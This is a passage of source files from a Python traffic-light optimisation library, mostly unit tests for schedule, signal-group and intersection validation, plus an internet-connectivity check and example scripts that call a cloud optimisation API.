traffic_lights=[TrafficLight(capacity=800, lost_time=1)],\n min_greenyellow=10, max_greenyellow=80, min_red=10, max_red=80)\n sg2 = SignalGroup(id=\"sg2\", traffic_lights=[TrafficLight(capacity=800, lost_time=1)],\n min_greenyellow=10, max_greenyellow=80, min_red=10, max_red=80)\n\n # WHEN\n fts = FixedTimeSchedule(**input_dict)\n\n # using id should give the same result\n self.assertEqual(fts.get_greenyellow_intervals(signalgroup=sg1),\n fts.get_greenyellow_intervals(signalgroup=sg1.id))\n self.assertEqual(fts.get_greenyellow_intervals(signalgroup=sg2),\n fts.get_greenyellow_intervals(signalgroup=sg2.id))\n\n def test_retrieving_for_unknown_signalgroup(self):\n \"\"\" test retrieving greenyellow intervals of an unknown signal group \"\"\"\n # GIVEN\n input_dict = TestFTSMethods.get_default_fts_inputs()\n # unknown signal group\n sg3 = SignalGroup(id=\"sg3\", traffic_lights=[TrafficLight(capacity=800, lost_time=1)],\n min_greenyellow=10, max_greenyellow=80, min_red=10, max_red=80)\n\n fts = FixedTimeSchedule(**input_dict)\n\n with self.assertRaises(ValueError):\n # WHEN trying to access greenyellow intervals of an unknown signal group\n fts.get_greenyellow_intervals(sg3)\n\n # THEN an error should be raised\n\n # same but using id\n with self.assertRaises(ValueError):\n # WHEN trying to access greenyellow intervals of an unknown signal group\n fts.get_greenyellow_intervals(sg3.id)\n\n # THEN an error should be raised\n\n def 
test_retrieving_single_greenyellow_interval(self):\n \"\"\" test retrieving a single greenyellow interval of a signal group \"\"\"\n # GIVEN\n input_dict = TestFTSMethods.get_default_fts_inputs()\n sg1 = SignalGroup(id=\"sg1\", traffic_lights=[TrafficLight(capacity=800, lost_time=1)],\n min_greenyellow=10, max_greenyellow=80, min_red=10, max_red=80)\n sg2 = SignalGroup(id=\"sg2\", traffic_lights=[TrafficLight(capacity=800, lost_time=1)],\n min_greenyellow=10, max_greenyellow=80, min_red=10, max_red=80)\n\n # WHEN\n fts = FixedTimeSchedule(**input_dict)\n\n # THEN\n self.assertEqual(fts.get_greenyellow_interval(signalgroup=sg1, k=0),\n input_dict[\"greenyellow_intervals\"][\"sg1\"][0])\n self.assertEqual(fts.get_greenyellow_interval(signalgroup=sg1, k=1),\n input_dict[\"greenyellow_intervals\"][\"sg1\"][1])\n self.assertEqual(fts.get_greenyellow_interval(signalgroup=sg2, k=0),\n input_dict[\"greenyellow_intervals\"][\"sg2\"][0])\n\n def test_retrieving_single_interval_with_id(self):\n # GIVEN\n input_dict = TestFTSMethods.get_default_fts_inputs()\n sg1 = SignalGroup(id=\"sg1\", traffic_lights=[TrafficLight(capacity=800, lost_time=1)],\n min_greenyellow=10, max_greenyellow=80, min_red=10, max_red=80)\n sg2 = SignalGroup(id=\"sg2\", traffic_lights=[TrafficLight(capacity=800, lost_time=1)],\n min_greenyellow=10, max_greenyellow=80, min_red=10, max_red=80)\n\n # WHEN\n fts = FixedTimeSchedule(**input_dict)\n\n # THEN using id should give the same information\n self.assertEqual(fts.get_greenyellow_interval(signalgroup=sg1, k=0),\n fts.get_greenyellow_interval(signalgroup=sg1.id, k=0))\n self.assertEqual(fts.get_greenyellow_interval(signalgroup=sg1, k=1),\n fts.get_greenyellow_interval(signalgroup=sg1.id, k=1))\n self.assertEqual(fts.get_greenyellow_interval(signalgroup=sg2, k=0),\n fts.get_greenyellow_interval(signalgroup=sg2.id, k=0))\n\n def test_retrieving_single_interval_for_unknown_signalgroup(self):\n \"\"\" test retrieving greenyellow intervals of an unknown signal group \"\"\"\n # GIVEN\n input_dict = TestFTSMethods.get_default_fts_inputs()\n # unknown signal group\n sg3 = SignalGroup(id=\"sg3\", traffic_lights=[TrafficLight(capacity=800, lost_time=1)],\n min_greenyellow=10, max_greenyellow=80, min_red=10, max_red=80)\n\n fts = FixedTimeSchedule(**input_dict)\n\n with self.assertRaises(ValueError):\n # WHEN trying to access greenyellow intervals of an unknown signal group\n fts.get_greenyellow_interval(sg3, k=0)\n\n # THEN an error should be raised\n\n def test_retrieving_unknown_interval(self):\n \"\"\" test retrieving a greenyellow interval with an index that does not exist \"\"\"\n # GIVEN\n input_dict = TestFTSMethods.get_default_fts_inputs()\n # known signal group\n sg1 = SignalGroup(id=\"sg1\", traffic_lights=[TrafficLight(capacity=800, lost_time=1)],\n min_greenyellow=10, max_greenyellow=80, min_red=10, max_red=80)\n\n fts = FixedTimeSchedule(**input_dict)\n\n with self.assertRaises(ValueError):\n # WHEN trying to access a greenyellow interval with a non-existing index\n fts.get_greenyellow_interval(sg1, k=2) # has only 2 intervals (with indices k=0 and k=1)\n\n # THEN an error should be raised\n\n\nclass TestFTSJsonConversion(unittest.TestCase):\n\n def test_json_back_and_forth(self) -> None:\n \"\"\" test converting back and forth from and to json \"\"\"\n # GIVEN\n input_dict = TestFTSInputValidation.get_default_inputs()\n\n # WHEN\n fixed_time_schedule = FixedTimeSchedule(**input_dict)\n\n # THEN converting back and forth should in the end give the same result\n fts_dict = 
fixed_time_schedule.to_json()\n fts_from_json = FixedTimeSchedule.from_json(fts_dict=fts_dict)\n self.assertDictEqual(fts_dict, fts_from_json.to_json())\n"
},
{
"alpha_fraction": 0.601645827293396,
"alphanum_fraction": 0.6068271994590759,
"avg_line_length": 40.531646728515625,
"blob_id": "2ccf8e845249bbc8bbe2d2c7158be37e47793da3",
"content_id": "021d3d81fdb9b9968e3e294fc06e0f351c40670e",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6562,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 158,
"path": "/swift_cloud_py/entities/intersection/test/test_signalgroup.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom typing import Dict\n\nfrom swift_cloud_py.entities.intersection.signalgroup import SignalGroup\nfrom swift_cloud_py.entities.intersection.traffic_light import TrafficLight\n\n\nclass TestInputValidation(unittest.TestCase):\n\n @staticmethod\n def get_default_inputs() -> Dict:\n \"\"\" function to get default (valid) inputs for SignalGroup() \"\"\"\n return dict(id=\"id1\", traffic_lights=[TrafficLight(capacity=1800, lost_time=1)],\n min_greenyellow=10, max_greenyellow=80, min_red=10, max_red=80, min_nr=1, max_nr=2)\n\n def test_successful_validation(self) -> None:\n \"\"\" test initializing SignalGroup object with correct input \"\"\"\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n\n # WHEN\n SignalGroup(**input_dict)\n\n # THEN no exception should occur\n\n def test_id_not_str(self) -> None:\n \"\"\" test providing the wrong type of id\"\"\"\n\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[\"id\"] = 1 # not a string\n # WHEN initializing the signal grouip\n signalgroup = SignalGroup(**input_dict)\n\n # THEN should not raise an error, input is converted to string (if possible)\n self.assertEqual(signalgroup.id, \"1\")\n\n def test_wrong_type_numbers(self) -> None:\n \"\"\" test providing the wrong type for numeric arguments\"\"\"\n\n for key in [\"min_greenyellow\", \"max_greenyellow\", \"min_red\", \"max_red\", \"min_nr\", \"max_nr\"]:\n with self.subTest(f\"Wrong type in input '{key}'\"):\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[key] = 'string' # all arguments are numbers\n with self.assertRaises(ValueError):\n # WHEN initializing the signal group\n SignalGroup(**input_dict)\n\n # THEN an error should be raised\n\n def test_float_instead_of_int(self) -> None:\n \"\"\" test providing float instead of int for min_nr and max_nr\"\"\"\n\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[\"min_nr\"] = 2.2\n input_dict[\"max_nr\"] = 3.2\n # WHEN initializing the signal group\n signalgroup = SignalGroup(**input_dict)\n\n # THEN no error should be raised. 
The numbers are converted to ints:\n        self.assertEqual(signalgroup.min_nr, 2)\n        self.assertEqual(signalgroup.max_nr, 3)\n\n    def test_min_nr_below_one(self):\n        \"\"\" test min_nr being smaller than one\"\"\"\n        # GIVEN\n        input_dict = TestInputValidation.get_default_inputs()\n        input_dict[\"min_nr\"] = 0\n\n        with self.assertRaises(ValueError):\n            # WHEN initializing the signal group\n            SignalGroup(**input_dict)\n\n        # THEN an error should be raised\n\n    def test_negativity(self) -> None:\n        \"\"\" Test providing negative values for min_greenyellow, max_greenyellow, min_red, max_red, min_nr, max_nr \"\"\"\n\n        for key in [\"min_greenyellow\", \"max_greenyellow\", \"min_red\", \"max_red\", \"min_nr\", \"max_nr\"]:\n            with self.subTest(f\"Negative input for '{key}'\"):\n                # GIVEN\n                input_dict = TestInputValidation.get_default_inputs()\n                input_dict[key] = -0.1 # values should be non-negative\n                with self.assertRaises(ValueError):\n                    # WHEN initializing the SignalGroup\n                    SignalGroup(**input_dict)\n\n                # THEN an error should be raised\n\n    def test_being_zero(self) -> None:\n        \"\"\" Test providing zero values for max_greenyellow and max_red\"\"\"\n\n        for key in [\"max_greenyellow\", \"max_red\"]:\n            with self.subTest(f\"Zero input for '{key}'\"):\n                # GIVEN\n                input_dict = TestInputValidation.get_default_inputs()\n                input_dict[key] = 0.0 # values should be strictly positive\n                with self.assertRaises(ValueError):\n                    # WHEN initializing the SignalGroup\n                    SignalGroup(**input_dict)\n\n                # THEN an error should be raised\n\n    def test_max_smaller_than_min(self) -> None:\n        \"\"\" Test maximum value being smaller than minimum value, e.g., for maximum and minimum greenyellow times \"\"\"\n\n        for min_var, max_var in [(\"min_greenyellow\", \"max_greenyellow\"), (\"min_red\", \"max_red\"), (\"min_nr\", \"max_nr\")]:\n            with self.subTest(f\"{max_var} smaller than {min_var}\"):\n                with self.assertRaises(ValueError):\n                    # GIVEN\n                    input_dict = TestInputValidation.get_default_inputs()\n                    input_dict[min_var] = 2.2 # minimum value\n                    input_dict[max_var] = 1.2 # maximum value smaller than the minimum\n                    # WHEN initializing the signalgroup\n                    SignalGroup(**input_dict)\n\n                # THEN an error should be raised\n\n    def test_wrong_type_for_traffic_lights(self) -> None:\n        \"\"\" test providing the wrong type for traffic_lights (not a list)\"\"\"\n\n        # GIVEN\n        input_dict = TestInputValidation.get_default_inputs()\n        input_dict[\"traffic_lights\"] = \"wrong type\" # should be a list of TrafficLight objects\n        with self.assertRaises(ValueError):\n            # WHEN initializing the signal group\n            SignalGroup(**input_dict)\n\n        # THEN an error should be raised\n\n    def test_wrong_type_for_elements_of_traffic_lights(self) -> None:\n        \"\"\" test providing the wrong type for an element of traffic_lights (not a TrafficLight)\"\"\"\n\n        # GIVEN\n        input_dict = TestInputValidation.get_default_inputs()\n        input_dict[\"traffic_lights\"][0] = \"wrong type\" # should be a TrafficLight object\n        with self.assertRaises(ValueError):\n            # WHEN initializing the signal group\n            SignalGroup(**input_dict)\n\n        # THEN an error should be raised\n\n\nclass TestJsonConversion(unittest.TestCase):\n    def test_json_back_and_forth(self) -> None:\n        \"\"\" test converting back and forth from and to json \"\"\"\n        # GIVEN\n        input_dict = TestInputValidation.get_default_inputs()\n\n        # WHEN\n        signalgroup = SignalGroup(**input_dict)\n\n        # THEN converting back and forth should in the end give the same result\n        signalgroup_dict = signalgroup.to_json()\n        signalgroup_from_json = SignalGroup.from_json(signalgroup_dict=signalgroup_dict)\n        
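# NOTE (added clarification): the dict comparison below covers every field at once;\n        # a hypothetical per-attribute check such as\n        # self.assertEqual(signalgroup.id, signalgroup_from_json.id)\n        # would be implied by the dict equality\n        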
self.assertDictEqual(signalgroup_dict, signalgroup_from_json.to_json())\n"
},
{
"alpha_fraction": 0.6950585246086121,
"alphanum_fraction": 0.6970090866088867,
"avg_line_length": 37.45000076293945,
"blob_id": "f2501417fb435d4fb39752d4d3032d6d81072350",
"content_id": "8bdb6792b4a2918e957953479f17fcc80fcc27d6",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1538,
"license_type": "permissive",
"max_line_length": 116,
"num_lines": 40,
"path": "/swift_cloud_py/authentication/check_internet_connection.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import socket\nfrom collections import Callable\n\nfrom swift_cloud_py.common.errors import NoInternetConnectionException\n\n\ndef has_internet_connection() -> bool:\n \"\"\"\n test whether a working internet connection is present\n :return: boolean indicating presence of working internet connection\n \"\"\"\n\n # test if we could connect to either one of the following websites; it is highly improbable that all of them\n # are down.\n for website in [\"www.google.com\", \"www.amazon.com\"]:\n try:\n host = socket.gethostbyname(website)\n s = socket.create_connection((host, 80), 2)\n s.close()\n return True # connection was established; assuming internet connection is available\n except socket.gaierror: # could not establish connection with the website\n pass\n\n return False # no connection could be established; assuming not internet connection is available\n\n\ndef ensure_has_internet(func: Callable) -> Callable:\n \"\"\"\n wrapper function that can be used as a decorator around the methods of SwiftMobilityCloudApi; it ensures that an\n internet connection is present (if not an error is raised).\n :param func: method of SwiftMobilityCloudApi.\n :return: wrapped method.\n \"\"\"\n # args and kwargs to allow for methods that have multiple named and unnamed arguments\n def wrapper(*args, **kwargs):\n if not has_internet_connection():\n raise NoInternetConnectionException()\n return func(*args, **kwargs)\n\n return wrapper\n"
},
{
"alpha_fraction": 0.5914227366447449,
"alphanum_fraction": 0.6101334095001221,
"avg_line_length": 44.74576187133789,
"blob_id": "a53a3bf94264a049bbf0353dbe2c0b8f0c3cf590",
"content_id": "fe0114d90964855edcd6728d6b201d3d7bb8345c",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10796,
"license_type": "permissive",
"max_line_length": 118,
"num_lines": 236,
"path": "/swift_cloud_py/entities/intersection/test/test_intersection.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom itertools import product\nfrom typing import Dict\n\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.entities.intersection.periodic_order import PeriodicOrder\nfrom swift_cloud_py.entities.intersection.sg_relations import Conflict, SyncStart, Offset, GreenyellowLead, \\\n GreenyellowTrail\nfrom swift_cloud_py.entities.intersection.signalgroup import SignalGroup\nfrom swift_cloud_py.entities.intersection.traffic_light import TrafficLight\n\n\nclass TestInputValidation(unittest.TestCase):\n\n @staticmethod\n def get_default_inputs() -> Dict:\n \"\"\" Function to get default (valid) inputs for Intersection() \"\"\"\n signalgroups = [SignalGroup(id=f\"sg{i+1}\", traffic_lights=[TrafficLight(capacity=1800, lost_time=1)],\n min_greenyellow=10, max_greenyellow=80, min_red=10, max_red=80) for i in range(6)]\n conflicts = [Conflict(id1=\"sg1\", id2=\"sg2\", setup12=1, setup21=2),\n Conflict(id1=\"sg1\", id2=\"sg6\", setup12=1, setup21=2),\n Conflict(id1=\"sg2\", id2=\"sg6\", setup12=1, setup21=2)]\n sync_starts = [SyncStart(from_id=\"sg1\", to_id=\"sg3\")]\n offsets = [Offset(from_id=\"sg1\", to_id=\"sg4\", seconds=10)]\n periodic_orders = [PeriodicOrder(order=[\"sg1\", \"sg2\", \"sg6\"])]\n greenyellow_leads = [GreenyellowLead(from_id=\"sg1\", to_id=\"sg5\", min_seconds=1, max_seconds=10)]\n greenyellow_trails = [GreenyellowTrail(from_id=\"sg5\", to_id=\"sg1\", min_seconds=2, max_seconds=8)]\n return dict(signalgroups=signalgroups, conflicts=conflicts, sync_starts=sync_starts,\n offsets=offsets, greenyellow_leads=greenyellow_leads, greenyellow_trails=greenyellow_trails,\n periodic_orders=periodic_orders)\n\n def test_successful_validation(self) -> None:\n \"\"\" Test initializing Intersection object with correct input \"\"\"\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n\n # WHEN\n Intersection(**input_dict)\n\n # THEN no exception should occur\n\n def test_wrong_type(self) -> None:\n \"\"\" Test providing the wrong type of arguments (no list)\"\"\"\n\n # WHEN an input contains the wrong data type\n for key in TestInputValidation.get_default_inputs():\n with self.subTest(f\"Wrong type in input '{key}'\"):\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[key] = 10 # wrong type (not a list)\n with self.assertRaises(TypeError):\n # WHEN initializing the intersection\n Intersection(**input_dict)\n\n # THEN an error should be raised\n\n def test_wrong_type_in_list(self) -> None:\n \"\"\" Test providing the wrong type of elements inside the arguments (which are lists) \"\"\"\n\n for key in TestInputValidation.get_default_inputs():\n with self.subTest(f\"Wrong type in input '{key}'\"):\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[key].append(10) # add other object (of wrong type) to the list\n with self.assertRaises(TypeError):\n # WHEN initializing the intersection\n Intersection(**input_dict)\n\n # THEN an error should be raised\n\n def test_ids_not_unique(self) -> None:\n \"\"\" Test for multiple signal groups having the same id \"\"\"\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n\n # WHEN an id is used twice\n input_dict[\"signalgroups\"][-1].id = \"sg1\" # other object (of wrong type) to the list\n with self.assertRaises(ValueError):\n Intersection(**input_dict)\n\n # THEN an error should be raised\n\n def test_unknown_ids(self) -> None:\n \"\"\" Test unknown ids being used in relations between signal groups \"\"\"\n 
# GIVEN\n        input_dict = TestInputValidation.get_default_inputs()\n\n        # WHEN an unknown id is used in a relation between signal groups\n        for key in [\"conflicts\", \"sync_starts\", \"offsets\", \"greenyellow_leads\"]:\n            if key == \"conflicts\":\n                input_dict[key][0].id1 = \"unknown\"\n            else:\n                input_dict[key][0].from_id = \"unknown\"\n            with self.subTest(f\"Unknown id used in input '{key}'\"):\n                with self.assertRaises(ValueError):\n                    Intersection(**input_dict)\n\n            # THEN an error should be raised\n\n    def test_multiple_relations(self) -> None:\n        \"\"\" Test multiple relations being provided for the same pair of signal groups \"\"\"\n        # GIVEN\n        input_dict = TestInputValidation.get_default_inputs()\n\n        # WHEN two signal group relations exist for the same signal group pair\n        id1 = \"new_id1\"\n        id2 = \"new_id2\"\n        for key1, key2 in product([\"conflicts\", \"sync_starts\", \"offsets\", \"greenyellow_leads\"],\n                                  [\"conflicts\", \"sync_starts\", \"offsets\", \"greenyellow_leads\"]):\n            if key1 == key2:\n                continue\n\n            if key1 == \"conflicts\":\n                input_dict[key1][0].id1 = id1\n                input_dict[key1][0].id2 = id2\n            else:\n                input_dict[key1][0].from_id = id2\n                input_dict[key1][0].to_id = id1\n\n            if key2 == \"conflicts\":\n                input_dict[key2][0].id1 = id1\n                input_dict[key2][0].id2 = id2\n            else:\n                input_dict[key2][0].from_id = id2\n                input_dict[key2][0].to_id = id1\n\n            with self.subTest(f\"Two relations ('{key1}' and '{key2}') for same signalgroup pair\"):\n                with self.assertRaises(ValueError):\n                    Intersection(**input_dict)\n\n            # THEN an error should be raised\n\n    def test_setup_too_small(self) -> None:\n        \"\"\" Test for setup time being too small \"\"\"\n        # GIVEN\n        input_dict = TestInputValidation.get_default_inputs()\n\n        # WHEN setup12 plus min_greenyellow of signal group sg1 is not strictly positive\n        for setup12 in [-10, -11]: # equal to min_greenyellow or even smaller\n            with self.subTest(f\"setup too small: '{setup12}'\"):\n                input_dict[\"conflicts\"][0].setup12 = setup12\n                with self.assertRaises(ValueError):\n                    Intersection(**input_dict)\n\n            # THEN an error should be raised\n\n    def test_unknown_ids_in_periodic_order(self):\n        \"\"\" Test using an unknown signal group id in a periodic order \"\"\"\n        # GIVEN\n        input_dict = TestInputValidation.get_default_inputs()\n\n        # WHEN\n        input_dict[\"periodic_orders\"] = [PeriodicOrder([\"sg1\", \"sg2\", \"unknown_id\"])]\n\n        with self.assertRaises(ValueError):\n            Intersection(**input_dict)\n\n    def test_subsequent_non_conflicting_ids_in_periodic_order(self):\n        \"\"\" Test a periodic order containing two subsequent signal groups that do not conflict \"\"\"\n        # GIVEN\n        input_dict = TestInputValidation.get_default_inputs()\n\n        # WHEN\n        input_dict[\"periodic_orders\"] = [PeriodicOrder([\"sg1\", \"sg2\", \"sg3\"])]\n\n        with self.assertRaises(ValueError):\n            Intersection(**input_dict)\n\n\nclass TestGettingSignalGroup(unittest.TestCase):\n    \"\"\"Test retrieving signal group by id from intersection object\"\"\"\n\n    def test_getting_signal_group(self):\n        \"\"\" Test retrieving signal group by id \"\"\"\n        # GIVEN\n        signalgroup1 = SignalGroup(id=\"sg1\", traffic_lights=[TrafficLight(capacity=1800, lost_time=1)],\n                                   min_greenyellow=10, max_greenyellow=80, min_red=10, max_red=80)\n        signalgroup2 = SignalGroup(id=\"sg2\", traffic_lights=[TrafficLight(capacity=1800, lost_time=1)],\n                                   min_greenyellow=10, max_greenyellow=80, min_red=10, max_red=80)\n\n        intersection = Intersection(signalgroups=[signalgroup1, signalgroup2], conflicts=[], sync_starts=[],\n                                    offsets=[], greenyellow_leads=[])\n\n        # WHEN/THEN\n        self.assertEqual(intersection.get_signalgroup(signalgroup_id=\"sg1\"), signalgroup1)\n        self.assertEqual(intersection.get_signalgroup(signalgroup_id=\"sg2\"), 
signalgroup2)\n\n    def test_getting_non_existing_signal_group(self):\n        \"\"\" Test retrieving signal group by id when this id does not exist \"\"\"\n        # GIVEN\n        signalgroup1 = SignalGroup(id=\"sg1\", traffic_lights=[TrafficLight(capacity=1800, lost_time=1)],\n                                   min_greenyellow=10, max_greenyellow=80, min_red=10, max_red=80)\n        signalgroup2 = SignalGroup(id=\"sg2\", traffic_lights=[TrafficLight(capacity=1800, lost_time=1)],\n                                   min_greenyellow=10, max_greenyellow=80, min_red=10, max_red=80)\n        intersection = Intersection(signalgroups=[signalgroup1, signalgroup2], conflicts=[], sync_starts=[],\n                                    offsets=[], greenyellow_leads=[])\n\n        with self.assertRaises(ValueError):\n            # WHEN\n            intersection.get_signalgroup(signalgroup_id=\"sg3\")\n\n        # THEN an error should be raised\n\n\nclass TestOtherRelations(unittest.TestCase):\n    def test_other_relations(self) -> None:\n        \"\"\" Test if the attribute other_relations contains all other relations (sync starts,\n        offsets, greenyellow-leads and greenyellow-trails)\"\"\"\n        # GIVEN\n        input_dict = TestInputValidation.get_default_inputs()\n\n        # WHEN initializing the intersection\n        intersection = Intersection(**input_dict)\n\n        other_relations = intersection.other_relations\n        # THEN other_relations is the list of all sync_starts, offsets, greenyellow-leads and greenyellow-trails\n        self.assertEqual(len(input_dict[\"sync_starts\"]) + len(input_dict[\"offsets\"]) +\n                         len(input_dict[\"greenyellow_leads\"]) + len(input_dict[\"greenyellow_trails\"]),\n                         len(other_relations))\n        for key in [\"sync_starts\", \"offsets\", \"greenyellow_leads\", \"greenyellow_trails\"]:\n            with self.subTest(f\"'{key}' in other_relations\"):\n                for other_relation in input_dict[key]:\n                    self.assertIn(other_relation, other_relations)\n\n\nclass TestJsonConversion(unittest.TestCase):\n    def test_json_back_and_forth(self) -> None:\n        \"\"\" Test converting back and forth from and to json \"\"\"\n        # GIVEN\n        input_dict = TestInputValidation.get_default_inputs()\n\n        # WHEN\n        intersection = Intersection(**input_dict)\n\n        # THEN converting back and forth should in the end give the same result\n        intersection_dict = intersection.to_json()\n        intersection_from_json = Intersection.from_json(intersection_dict=intersection_dict)\n        self.assertDictEqual(intersection_dict, intersection_from_json.to_json())\n"
},
{
"alpha_fraction": 0.7383720874786377,
"alphanum_fraction": 0.7449128031730652,
"avg_line_length": 49.34146499633789,
"blob_id": "a77d68c1aa80a69b8bf9a41e46fa4dde2aabf6a1",
"content_id": "b294a45efd350151b1144ecfe968e84f2cec8a1c",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4128,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 82,
"path": "/swift_cloud_py/examples/minimizing_delay.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import json\nimport logging\nimport os\n\nfrom swift_cloud_py.entities.scenario.queue_lengths import QueueLengths\nfrom swift_cloud_py.enums import ObjectiveEnum\nfrom swift_cloud_py.swift_cloud_api import SwiftMobilityCloudApi\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.entities.scenario.arrival_rates import ArrivalRates\n\n\ndef minimizing_delay(print_fixed_time_schedule: bool = False):\n \"\"\"\n In this example (given a traffic scenario) we search for the fixed-time schedule that minimizes the average\n delay that road uses (arriving during an horizon of 2 hours) are expected to experience at the intersection.\n\n Use case:\n This enables real-time optimization of traffic light control allowing truly dynamic and smart traffic\n light control that automatically adapts to the traffic situation. For example, by periodically computing the\n optimal fixed-time schedule, and automatically converting it to a vehicle-actuated controller (e.g., using\n the green times as maximum green times and allowing green times to be terminated prematurely).\n\n NOTE:\n To run the example below you need credentials to invoke the swift mobility cloud api.\n To this end, you need to specify the following environment variables:\n - smc_api_key: the access key of your swift mobility cloud api account\n - smc_api_secret: the secret access key of your swift mobility cloud api account\n If you do not have such an account yet, please contact [email protected].\n\n In this example, we load an intersection from disk (export of Swift Mobility Desktop). This functionality is tested\n with Swift Mobility Desktop 0.7.0.alpha.\n \"\"\"\n logging.info(f\"Running example '{os.path.basename(__file__)}'\")\n # absolute path to .json file that has been exported from swift mobility desktop\n smd_export = os.path.join(os.path.join(os.path.abspath(__file__), os.pardir), \"example_smd_export.json\")\n\n # retrieve the json structure from the file\n with open(smd_export, \"r\") as f:\n json_dict = json.load(f)\n\n logging.info(f\"Loading intersection and traffic situation from disk\")\n intersection = Intersection.from_json(intersection_dict=json_dict[\"intersection\"])\n arrival_rates = ArrivalRates.from_json(arrival_rates_dict=json_dict[\"arrival_rates\"])\n logging.info(f\"Loaded intersection and traffic situation from disk\")\n\n logging.info(f\"Minimizing delay\")\n fixed_time_schedule, phase_diagram, objective_value, _ = SwiftMobilityCloudApi.get_optimized_fts(\n intersection=intersection, arrival_rates=arrival_rates, min_period_duration=30, max_period_duration=180,\n objective=ObjectiveEnum.min_delay, horizon=2)\n\n logging.info(f\"Average experienced delay: {objective_value:.2f} seconds\")\n\n if print_fixed_time_schedule:\n logging.info(fixed_time_schedule)\n logging.info(phase_diagram)\n\n # intersection becomes oversaturated\n scaling_factor = 1.3\n logging.info(f\"Increasing original amount of traffic with {(scaling_factor - 1) * 100:.2f}%\")\n arrival_rates *= scaling_factor\n initial_queue = 25\n logging.info(f\"Adding initial queue of {initial_queue: d} PCE/cyclists/pedestrians to each queue\")\n id_to_queue_lengths = dict()\n for signalgroup in intersection.signalgroups:\n id_to_queue_lengths[signalgroup.id] = [initial_queue for _ in signalgroup.traffic_lights]\n initial_queue_lengths = QueueLengths(id_to_queue_lengths=id_to_queue_lengths)\n\n logging.info(f\"Minimizing delay\")\n fixed_time_schedule, phase_diagram, objective_value, _ = 
SwiftMobilityCloudApi.get_optimized_fts(\n intersection=intersection, arrival_rates=arrival_rates, min_period_duration=30, max_period_duration=180,\n objective=ObjectiveEnum.min_delay, horizon=2, initial_queue_lengths=initial_queue_lengths)\n\n logging.info(f\"Average experienced delay: {objective_value:.2f} seconds\")\n\n if print_fixed_time_schedule:\n logging.info(fixed_time_schedule)\n logging.info(phase_diagram)\n\n\nif __name__ == \"__main__\":\n logging.getLogger().setLevel(logging.INFO)\n minimizing_delay()\n"
},
{
"alpha_fraction": 0.7410272359848022,
"alphanum_fraction": 0.7507734894752502,
"avg_line_length": 58.30275344848633,
"blob_id": "9c7657e24df1bd0c47b4f1f49ff17270cfc9c194",
"content_id": "ef4c2a5919b0f5f5c3fb9e78741633415a322935",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6464,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 109,
"path": "/swift_cloud_py/examples/maximizing_intersection_capacity.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import json\nimport logging\nimport os\n\nfrom swift_cloud_py.enums import ObjectiveEnum\nfrom swift_cloud_py.swift_cloud_api import SwiftMobilityCloudApi\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.entities.scenario.arrival_rates import ArrivalRates\n\n\ndef maximize_intersection_capacity(print_fixed_time_schedule: bool = False):\n \"\"\"\n In this example (given a traffic scenario) we search for the fixed-time schedule that maximizes the largest\n increase in traffic (scaling factor) that the intersection is able handle without becoming unstable/oversaturated.\n\n This is very useful information as it gives an indication as to how close the intersection is to being\n oversaturated.\n - An objective value of f < 1 indicates that the intersection is oversaturated for all (!) possible\n fixed-time schedules. For example, if f=0.8 then it is impossible to prevent oversaturation (with any\n traffic light controller!) unless the amount of traffic at the intersection decreases by at least 20%\n (=(1-0.8)*100)).\n - An objective value of > 1 indicates that it is possible to prevent oversaturation at this intersection.\n For example, if f=1.2, then the amount of traffic arriving at the intersection may still increase by 20% without\n the intersection becoming oversaturated (under optimal traffic light control!)\n\n Usecase 1: Monitoring\n We can in real-time monitor the traffic situation and quantify the amount of traffic arriving at the intersection.\n This information can again be used for traffic management (e.g., redirect traffic to relieve highly congested parts\n of the network).\n\n Usecase 2: Smart traffic-light control\n Low-traffic and high-traffic situations require a different control strategy. We can periodically evaluate the\n traffic situation in an automated manner (e.g., every 30 minutes). Based on the result (the value of f) we can\n (automatically!) select the control strategy that best matches the current traffic situation;\n this would be truly smart traffic-light control!\n\n Usecase 3: Quantitative support to decide which traffic-light control to update.\n Suppose traffic flow is not as smooth as desired at an intersection (e.g., queue lengths are large) while we can\n quantify the intersection to have sufficient capacity (e.g., f < 0.8). It, might be sensible to reevaluate the\n currently used traffic-light controller (and potentially update this controller). In this way, we can decide\n which traffic-light controllers need to be updated and focus effort on these controllers.\n\n On the other hand, if the capacity of the intersection is expected to be insufficient as well (e.g., f > 1.0), then\n this might motivate infrastructural changes (see next usecase).\n\n Usecase 4: Support for strategic decision making on infrastructural changes to the road network.\n Traffic situations may change overtime (e.g., due to urban development). Therefore, it is very important to\n periodically evaluate if 